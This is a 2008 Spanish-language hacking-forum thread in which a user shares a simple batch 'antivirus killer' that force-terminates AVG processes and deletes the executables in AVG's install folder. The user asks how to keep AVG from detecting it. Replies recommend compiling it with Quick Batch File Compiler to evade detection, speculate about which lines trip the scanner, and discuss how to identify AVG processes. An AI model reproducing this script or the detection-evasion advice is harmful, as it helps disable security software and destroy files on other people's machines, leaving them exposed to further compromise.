elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Que no detecten mi av-killer hecho en batch...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Que no detecten mi av-killer hecho en batch...  (Leído 13,907 veces)
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Que no detecten mi av-killer hecho en batch...
« en: 10 Mayo 2008, 21:51 pm »

Estoy empezando en batch y escribí el código de un av-killer muy simple :xD

Ahí está:

Código:
@echo off
taskkill /f /im avgamsvr.exe
taskkill /f /im avgcc.exe
taskkill /f /im avgemc.exe
taskkill /f /im avgupsvc.exe
cd %programfiles%\Grisoft\AVG7
del *.exe
exit

Bueno, la cosa es que el avg me lo detecta y me niega el acceso al archivo (ni siquiera para editarlo). He probado con un .bat compiler, pero lo que hace es un .exe que crea el .bat en una carpeta temporal y lo ejecuta, con lo que obviamente el avg lo detecta al tiempo de la ejecución.

¿Hay alguna forma de mejorar el código de forma que no lo detecte el avg?
Graciasssss....

Carloswaldo :)


En línea





Dominio en venta: https://forojapones.com/
Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #1 en: 10 Mayo 2008, 21:58 pm »

Puedes mirar aca talvez:
http://foro.elhacker.net/scripting/batch_file_creator_generador_de_archivos_binarios_con_batch-t147020.0.html


En línea

MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #2 en: 10 Mayo 2008, 21:59 pm »

Podes usar un mejor compilador para tus batch (sugiero el Quick Batch File Compiler, tratá de obtenerlo full versión) o sino borrale estas lines :
Código:
cd %programfiles%\Grisoft\AVG7
del *.exe
Que son las que hacen que salte el av (creo)

Espero que te sirva ;)

PD: Usas el AVG ???  :-\ Te recomiendo un par:
- avast!
- Kaperspy
- NOD32 (considerado el mejor)
En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #3 en: 10 Mayo 2008, 22:01 pm »

Ese que recomiendas es muy bueno ;) Te lo re-recomiendo :xD

Te recomiendo un par: Sera trio :xD

Yo creo que la linea que hace que salte el AVG es del *.exe el resto es algo normal :P
En línea

MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #4 en: 10 Mayo 2008, 22:02 pm »

Un par se utiliza tambien para enlistar varios elementos (2 o más)

Citar
Yo creo que la linea que hace que salte el AVG es del *.exe el resto es algo normal tongue

Lo del cd estaría de más si se borrase la linea del comando del, asi que la incluí para que la borre  :rolleyes:
« Última modificación: 10 Mayo 2008, 22:04 pm por ^Arkangel^ » En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #5 en: 11 Mayo 2008, 20:10 pm »

Estaré probando el quick batch compiler

PD: Usas el AVG ???  :-\ Te recomiendo un par:
- avast!
- Kaperspy
- NOD32 (considerado el mejor)

Gracias por las sugerencias pero prefiero el avg por experiencias propias.

Por cierto, si yo mato esos procesos manualmente e intento abrir mi archivo .bat, me sale "Acceso Denegado", lo que sospecho es que algún servicio del avg sigue activo, alguna idea de como saber cuales son todos los procesos que utiliza el avg?
En línea





Dominio en venta: https://forojapones.com/
MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #6 en: 11 Mayo 2008, 20:44 pm »

Si, mientras esta activado, abri el administrador de tareas y fijate cuales son del av.

Un saludo ;)
En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #7 en: 11 Mayo 2008, 20:54 pm »

Si, mientras esta activado, abri el administrador de tareas y fijate cuales son del av.

OBVIO, pero como se yo cuales son. :¬¬
En línea





Dominio en venta: https://forojapones.com/
Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #8 en: 11 Mayo 2008, 20:55 pm »

Mirando los ejecutables que tienes en la ruta de la carpeta del AVG, OBVIO :xD
En línea

Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #9 en: 11 Mayo 2008, 21:12 pm »

Qué? y eso como se ve?

Por cierto con el Qbc me va de lujo, pero cuando quiero ejecutar el ejecutable a partir del codigo anterior no hace absolutamente nada como gosth aplication, si lo pongo en modo consola me sale en una linea "Acceso Denegado", sin embargo el exe no es detectado por el avg. :-\ Ideas?
En línea





Dominio en venta: https://forojapones.com/
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿Cómo evitar que me detecten en... « 1 2 »
Redes
bertitop 10 33,302 Último mensaje 17 Febrero 2012, 21:04 pm
por bertitop
Reproductor mp3 hecho en batch
Software
**Aincrad** 0 1,330 Último mensaje 13 Junio 2017, 05:45 am
por **Aincrad**
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines